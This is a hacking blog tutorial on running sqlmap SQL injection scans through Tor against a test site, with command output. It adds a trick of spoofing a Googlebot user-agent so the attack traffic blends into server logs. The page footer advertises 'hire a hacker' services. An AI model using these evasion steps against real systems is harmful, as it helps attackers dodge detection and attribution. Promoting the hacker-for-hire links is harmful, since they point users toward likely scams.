SQLMap with Tor for Anonymity

#1 Y3llowl4bs Hackers - Blog - anonymity - SQLMap with Tor for Anonymity
SQLMap with Tor for Anonymity

[*]
In a previous tutorial, I had demonstrated how to use SqlMap to carry out Sql Injection on a website. In this tutorial, I will show you how to use Tor to add a layer of obscurity between you and the target website.

Installing Tor

[*]
Tor onion networkGetting tor for Kali Linux is as simple as typing a single line in the terminal-

apt-get instal tor

If you have any problems installing, then do an apt-get update first.

Start Tor

This is also quite simple

tor

You’ll see something like this-

Root@kali:

    Sep 04 02:41:25.806 [notice] Tor v0.2.8.7 (git-cc2f02ef17899f86) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.0.2h and Zlib 1.2.8.
    Sep 04 02:41:25.806 [notice] Tor can’t help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
    Sep 04 02:41:25.806 [notice] Read configuration file “/etc/tor/torrc”.
    Sep 04 02:41:25.811 [notice] Opening Socks listener on 127.0.0.1:9050
    Sep 04 02:41:25.000 [notice] Parsing GEOIP IPv4 file /usr/share/tor/geoip.
    Sep 04 02:41:25.000 [notice] Parsing GEOIP IPv6 file /usr/share/tor/geoip6.
    Sep 04 02:41:26.000 [warn] You are running Tor as root. You don’t need to, and you probably shouldn’t.
    Sep 04 02:41:26.000 [notice] Bootstrapped 0%: Starting
    Sep 04 02:41:27.000 [notice] Bootstrapped 5%: Connecting to directory server
    Sep 04 02:41:27.000 [notice] Bootstrapped 10%: Finishing handshake with directory server
    Sep 04 02:41:27.000 [notice] Bootstrapped 15%: Establishing an encrypted directory connection
    Sep 04 02:41:27.000 [notice] Bootstrapped 20%: Asking for networkstatus consensus
    Sep 04 02:41:28.000 [notice] Bootstrapped 25%: Loading networkstatus consensus
    Sep 04 02:41:29.000 [notice] I learned some more directory information, but not enough to build a circuit: We have no usable consensus.
    Sep 04 02:41:30.000 [notice] Bootstrapped 40%: Loading authority key certs
    Sep 04 02:41:30.000 [notice] Bootstrapped 45%: Asking for relay descriptors
    Sep 04 02:41:30.000 [notice] I learned some more directory information, but not enough to build a circuit: We need more microdescriptors: we have 0/7117, and can only build 0% of likely paths. (We have 0% of guards bw, 0% of midpoint bw, and 0% of exit bw = 0% of path bw.)
    Sep 04 02:41:31.000 [notice] Bootstrapped 50%: Loading relay descriptors
    Sep 04 02:41:34.000 [notice] Bootstrapped 55%: Loading relay descriptors
    Sep 04 02:41:34.000 [notice] Bootstrapped 61%: Loading relay descriptors
    Sep 04 02:41:34.000 [notice] Bootstrapped 66%: Loading relay descriptors
    Sep 04 02:41:34.000 [notice] Bootstrapped 73%: Loading relay descriptors
    Sep 04 02:41:34.000 [notice] Bootstrapped 78%: Loading relay descriptors
    Sep 04 02:41:35.000 [notice] Bootstrapped 80%: Connecting to the Tor network
    Sep 04 02:41:36.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
    Sep 04 02:41:38.000 [notice] Tor has successfully opened a circuit. Looks like client functionality is working.
    Sep 04 02:41:38.000 [notice] Bootstrapped 100%: Done

Important: Don’t close this terminal. Open a new terminal for further steps.

Testing with Sqlmap

Use this command

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 –tor –tor-type=SOCKS5

[*]

Sqlmap%2Bwith%2BTor%2Bsocks5

[*]
If you want a text version:-

Root@kali:

    _
    ___ ___| |_____ ___ ___ {1.0.8.2#dev}
    |_ -| . | | | .’| . |
    |___|_ |_|_|_|_|__,| _|
    |_| |_| http://sqlmap.org

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 02:47:02

    [02:47:02] [WARNING] increasing default value for option ‘–time-sec’ to 10 because switch ‘–tor’ was provided
    [02:47:02] [INFO] setting Tor SOCKS proxy settings
    [02:47:02] [INFO] testing connection to the target URL
    [02:47:03] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
    [02:47:04] [INFO] testing if the target URL is stable
    [02:47:06] [INFO] target URL is stable
    [02:47:06] [INFO] testing if GET parameter ‘cat’ is dynamic
    [02:47:07] [INFO] confirming that GET parameter ‘cat’ is dynamic

Additional obscurity

[*]
Google’s crawlers often visit websites, and are one of the least suspicious entities in the website’s logs. We can use that to our advantage. Use this command to pretend to be googleBot.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 –tor –tor-type=SOCKS5 –user-agent=”Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”

 This is what you would see.

SqlMap%2Bwith%2BTor

At this point, you are going to look like a google bot, and your IP would be that of some Tor exit node. This should be enough for most purposes.

This is all I had in mind for this tutorial. I urge you not to assume that using Tor means you can do illegal stuff and get away with it. This tutorial is written only for educational purposes.

Tags :
Share :

administrator

Related Post

Has your password been leaked?
database dump, database leak, encyrption, hashing, hashing salt, password leaks, SQL, SQL injection

Has your password been leaked?

November 29, 2022
Stay anonymous while hacking online using TOR and Proxychains
anonymity, anonymous, hacking with kali linux, hide your ip, Kali 2.0, Kali Basics Tutorials, Kali Linux, kali tutorials, proxychains, tor

Stay anonymous while hacking online using TOR and

November 29, 2022

Leave a Reply

Your email address will not be published. Required fields are marked *

fb logo
recover dogecoin from a scam
recover ethereum from a scammer
hire a hacker to hack iphone
hire a hacker to hack snapchat
hire a hacker to hack a windows computer
error: Content is protected !!